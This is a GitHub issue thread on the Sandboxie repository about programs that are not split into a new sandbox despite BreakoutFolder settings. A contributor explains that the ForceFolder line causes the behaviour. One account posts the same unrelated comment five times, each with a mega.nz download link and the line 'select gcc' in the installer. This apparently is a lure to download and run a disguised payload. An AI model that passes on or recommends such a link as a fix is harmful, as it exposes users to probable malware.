### ISSUE TITLE
cant spilt program in new sandbox

### ISSUE THREAD

**Issue by ydx1013** [sandboxie-plus/Sandboxie#4168]
### Describe what you noticed and did

ForceFolder=D:\Scoop
BoxNameTitle=-
OpenPipePath=D:\Personal\
OpenPipePath=D:\Scoop\
ForceProcess=wechat.exe
BreakoutFolder=D:\Scoop\apps\7zip
BreakoutFolder=D:\Scoop\apps\everything
BreakoutFolder=D:\Scoop\apps\wps_self
BreakoutFolder=D:\Scoop\apps\steam

### How often did you encounter it so far?

everytime

### Expected behavior

can split program

### Affected program

everything

### Download link

"Not available".

### Where is the program located?

The program is installed both inside and outside the sandbox.

### Did the program or any related process close unexpectedly?

No, not at all.

### What version of Sandboxie are you running now?

always cannt run  1.14.6

### Is it a new installation of Sandboxie?

I recently did a new clean installation.

### Is it a regression from previous versions?

1.14.6

### In which sandbox type you have this problem?

In a standard isolation sandbox (yellow sandbox icon).

### Can you reproduce this problem on a new empty sandbox?

I can confirm it also on a new empty sandbox.

### What is your Windows edition and version?

win10 pro 22h2

### In which Windows account you have this problem?

A local account (Administrator).

### Please mention any installed security software

no

### Sandboxie.ini configuration

```ini
ForceFolder=D:\Scoop
BoxNameTitle=-
OpenPipePath=D:\Personal\
OpenPipePath=D:\Scoop\
ForceProcess=wechat.exe
BreakoutFolder=D:\Scoop\apps\7zip
BreakoutFolder=D:\Scoop\apps\everything
BreakoutFolder=D:\Scoop\apps\wps_self
BreakoutFolder=D:\Scoop\apps\steam
```

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by ydx1013** [comment]
i set an new sandbox,and let ForceFolder=D:\Scoop, 
next, BreakoutFolder=D:\Scoop\apps\steam,
and let steam run in a new sandbox  ForceFolder =D:\Scoop\apps\steam ,but steam program still run in old sandbox.

**Comment by love-code-yeyixiao** [comment]
ForceFolder make steam have to run in a box,please delete the line contain ForceFolder.












YeYixiao
***@***.***






---Original---
From: ***@***.***&gt;
Date: Sun, Aug 25, 2024 16:37 PM
To: ***@***.***&gt;;
Cc: ***@***.***&gt;;
Subject: Re: [sandboxie-plus/Sandboxie] cant spilt program in new sandbox(Issue #4168)




 
i set an new sandbox,and let ForceFolder=D:\Scoop,
 next, BreakoutFolder=D:\Scoop\apps\steam,
 and let steam run in a new sandbox  ForceFolder =D:\Scoop\apps\steam ,but steam program still run in old sandbox.

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."
